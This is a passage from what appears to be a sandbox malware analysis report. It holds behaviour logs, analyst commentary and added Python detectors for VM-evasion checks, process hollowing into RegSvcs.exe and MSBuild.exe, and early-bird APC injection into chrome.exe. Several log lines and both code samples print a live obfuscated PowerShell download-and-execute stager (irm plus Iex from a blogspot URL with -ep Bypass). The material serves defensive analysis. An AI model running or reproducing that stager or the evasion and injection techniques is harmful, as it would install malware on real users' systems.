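TIMESPAN_MAX_MS = (2**63 - 1) // 10_000  # 922337203685477

# WMI classes commonly read to fingerprint the hardware underneath a sandbox VM.
HW_CLASSES = {"Win32_PnPEntity", "Win32_BIOS", "Win32_BaseBoard",
              "Win32_ComputerSystem", "Win32_Processor"}


def parse_line(line):
    """Split one behaviour line into (source process, event name, detail)."""
    m = LINE_RE.match(line.strip())
    return (m.group("src"), m.group("event"), m.group("detail")) if m else None


def infinite_wait_multiple(delay_ms):
    """Return k if |delay_ms| == k * TimeSpan.MaxValue (k >= 1), else 0."""
    q, r = divmod(abs(int(delay_ms)), TIMESPAN_MAX_MS)
    return q if r == 0 and q >= 1 else 0


def classify(src, event, detail):
    """Map one behaviour line to an evasion category and a key detail, or None."""
    if event == "WMI Queries":
        m = re.search(r"FROM\s+(\w+)", detail)
        if m and m.group(1) in HW_CLASSES:
            return "wmi_hardware_fingerprint", m.group(1)
    elif event == "System information queried" and detail == "FirmwareTableInformation":
        return "firmware_table_read", detail      # SMBIOS/ACPI tables name the hypervisor
    elif event == "File opened / queried" and "vbox" in detail.lower():
        return "virtualbox_artifact", detail      # guest additions, drivers, IPC pipe
    elif event == "Process queried" and detail == "DebugPort":
        return "debugger_check", detail
    elif event in ("Thread delayed", "Thread sleep time"):
        m = re.search(r"-?\d+", detail)
        k = infinite_wait_multiple(m.group(0)) if m else 0
        if k:
            return "infinite_wait", f"{k} x TimeSpan.MaxValue"
    return None


def summarize(lines):
    """Return ({category: sorted unique details}, {process image: hit count})."""
    cats, per_proc = defaultdict(set), defaultdict(int)
    for line in lines:
        parsed = parse_line(line)
        hit = classify(*parsed) if parsed else None
        if hit:
            cats[hit[0]].add(hit[1])
            per_proc[parsed[0].split("\\")[-1].split(" ")[0]] += 1
    return {k: sorted(v) for k, v in cats.items()}, dict(per_proc)


# Constructed sample shaped like the report's entries (not copied from the analysis output).
SAMPLE = r"""
Source: C:\Windows\SysWOW64\dllhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
Source: C:\Windows\SysWOW64\dllhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\dllhost.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxGuest.sys
Source: C:\Windows\SysWOW64\dllhost.exeFile opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess queried: DebugPort
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
""".strip().splitlines()

if __name__ == "__main__":
    categories, counts = summarize(SAMPLE)
    for cat, items in categories.items():
        print(f"{cat:26} {items}")
    print(counts)
```

Run as a script to print the buckets; fed the full export it shows which process carries the VM checks (dllhost.exe here) and which ones park threads with no deadline (powershell.exe and RegSvcs.exe). A wait of TimeSpan.MaxValue never expires on its own; a sandbox that accelerates sleeps records it as a very long delay, which is presumably what the "Contains long sleeps (>= 3 min)" signature in the overview reflects.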

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\svchost.exe | Process created / APC Queued / Resumed: C:\Program Files\Google\Chrome\Application\chrome.exe
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A (4 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A (4 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 value starts with: 4D5A (4 identical entries)
            Source: C:\Windows\System32\svchost.exe | Section loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: execute and read and write
            Source: C:\Windows\System32\svchost.exe | Thread APC queued: target process: C:\Program Files\Google\Chrome\Application\chrome.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 (2 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 542000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 54A000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E60008
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 (2 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 542000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 54A000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F2C008
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 (2 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 542000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 54A000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 992008
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 (2 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 542000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 54A000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: EC2008
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 (2 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 402000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 542000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 54A000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 901008
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 (2 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 402000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 542000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 54A000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: ABB008
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" (2 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" (4 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" (2 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\SysWOW64\dllhost.exe "C:\Windows\System32\dllhost.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 940
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 936
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 680
            Source: C:\Windows\SysWOW64\dllhost.exe | Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
            Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;& ('{1}{0}' -f 'ex', 'i') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);start-sleep -seconds 6; (2 identical entries)
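
The entries above record the whole injection chain. wscript.exe launches powershell.exe with -ep Bypass, assembles the Invoke-Expression alias at runtime with the -f format operator (('{1}{0}' -f 'ex', 'I') evaluates to Iex) and hands it the body fetched with irm over forced TLS 1.2. PowerShell then starts RegSvcs.exe (v2.0 and v4.0) and MSBuild.exe and writes memory at base 400000 beginning with 4D5A ("MZ"), a PE image placed at the default image base of a freshly created .NET host, which is the shape of process hollowing. The v4.0 RegSvcs.exe spawns svchost.exe and dllhost.exe, and svchost.exe creates chrome.exe and queues an APC into it, the early-bird technique listed in the signatures. The dw20.exe children (the .NET error-reporting shim) suggest the v2.0 RegSvcs.exe and MSBuild.exe hosts crashed rather than ran the payload. The Python below is an added example written for this page, not sandbox code: it rebuilds the parent-child edges from behaviour lines, flags a child whose creator wrote an MZ header at its image base, flags APC delivery into a process the same writer created, and resolves the -f trick in the command line. The sample lines are constructed to mirror the report; the thresholds and category names are the example's own.

```python
"""Rebuild a process-injection chain from sandbox behaviour lines.

Added example for this report page, not Joe Sandbox code. SAMPLE is constructed to
mirror the report's entries; the heuristics (an "MZ" header written at a freshly
created child's image base, an APC queued into a process the same writer created,
resolution of PowerShell's -f format operator) are this example's own.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe(?: TID: \d+)?)\s*\|?\s*"
    r"(?P<event>[A-Za-z][A-Za-z /]*?):\s?(?P<detail>.*)$"
)
PATH_RE = re.compile(r'[A-Za-z]:\\[^"]+?\.exe', re.IGNORECASE)  # first image path in a detail
FMT_RE = re.compile(r"\(\s*'(?P<fmt>[^']*)'\s+-f\s+(?P<args>'[^']*'(?:\s*,\s*'[^']*')*)\s*\)")
MZ_HEX = "4D5A"                 # ASCII "MZ", the first two bytes of every PE image
DEFAULT_IMAGE_BASE = 0x400000   # link-time base of 32-bit executables such as RegSvcs.exe

def parse_line(line):
    """Split one behaviour line into (source process, event name, detail)."""
    m = LINE_RE.match(line.strip())
    return (m.group("src"), m.group("event"), m.group("detail")) if m else None

def resolve_format_operators(cmd):
    """Replace each ('{1}{0}' -f 'a', 'b') with the literal .NET's -f would build."""
    def expand(m):
        args = re.findall(r"'([^']*)'", m.group("args"))
        return "'" + re.sub(r"\{(\d+)\}", lambda p: args[int(p.group(1))], m.group("fmt")) + "'"
    return FMT_RE.sub(expand, cmd)

def analyze_powershell(cmd):
    """Flags worth raising on a PowerShell command line, evaluated after de-obfuscation."""
    resolved = resolve_format_operators(cmd)
    return {
        "exec_policy_bypass": bool(re.search(r"-e(?:xecutionpolicy|p)\s+bypass", cmd, re.I)),
        "invokes_iex": bool(re.search(r"\b(?:iex|invoke-expression)\b", resolved, re.I)),
        "remote_fetch": re.findall(
            r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\s+(https?://\S+?)(?=[);\s]|$)",
            resolved, re.I),
        "resolved": resolved,
    }

def injection_chain(lines):
    """Return (parent -> sorted children, hollowed children, early-bird APC targets)."""
    edges, mz_written, apc_targets = defaultdict(set), defaultdict(set), defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        src, event, detail = parsed
        src = src.lower()  # some command lines are logged in lower case; compare paths case-insensitively
        if event.startswith("Process created"):
            child = PATH_RE.search(detail)
            if child:
                edges[src].add(child.group(0).lower())
        elif event == "Memory written":
            m = re.match(r"(?P<target>.+?\.exe) base: (?P<base>[0-9A-Fa-f]+) value starts with: (?P<val>\w+)", detail)
            if m and m.group("val").upper().startswith(MZ_HEX) and int(m.group("base"), 16) == DEFAULT_IMAGE_BASE:
                mz_written[src].add(m.group("target").lower())
        elif event == "Thread APC queued":
            target = PATH_RE.search(detail)
            if target:
                apc_targets[src].add(target.group(0).lower())
    # Hollowing pattern: the writer spawned the child itself, then dropped a PE over its image base.
    hollowed = {t for w, ts in mz_written.items() for t in ts if t in edges.get(w, set())}
    # Early bird: an APC is queued into a process the same writer has just created.
    early_bird = {t for w, ts in apc_targets.items() for t in ts if t in edges.get(w, set())}
    return {k: sorted(v) for k, v in edges.items()}, hollowed, early_bird

# Constructed sample shaped like the report's entries (not copied from the analysis output).
SAMPLE = r"""
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 940
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Windows\System32\svchost.exeThread APC queued: target process: C:\Program Files\Google\Chrome\Application\chrome.exe
""".strip().splitlines()
PS_CMD = parse_line(SAMPLE[0])[2]  # the powershell.exe command line recorded in the first entry

if __name__ == "__main__":
    edges, hollowed, early_bird = injection_chain(SAMPLE)
    print(edges, hollowed, early_bird, sep="\n")
    print(analyze_powershell(PS_CMD))
```

Two caveats when running this over the real export. The report records the child of RegSvcs.exe as C:\Windows\SysWOW64\svchost.exe but that process's own later actions under C:\Windows\System32\svchost.exe (the same 32-bit process seen through WOW64 path redirection is the likely explanation), so a path-keyed tree leaves a gap that only PIDs would close, and these lines carry none. And the MZ check is an indicator rather than proof: the report shows the same base written several more times per target without the header, so the flag should be corroborated with the suspended-mode creation and the later behaviour of the host.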
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation
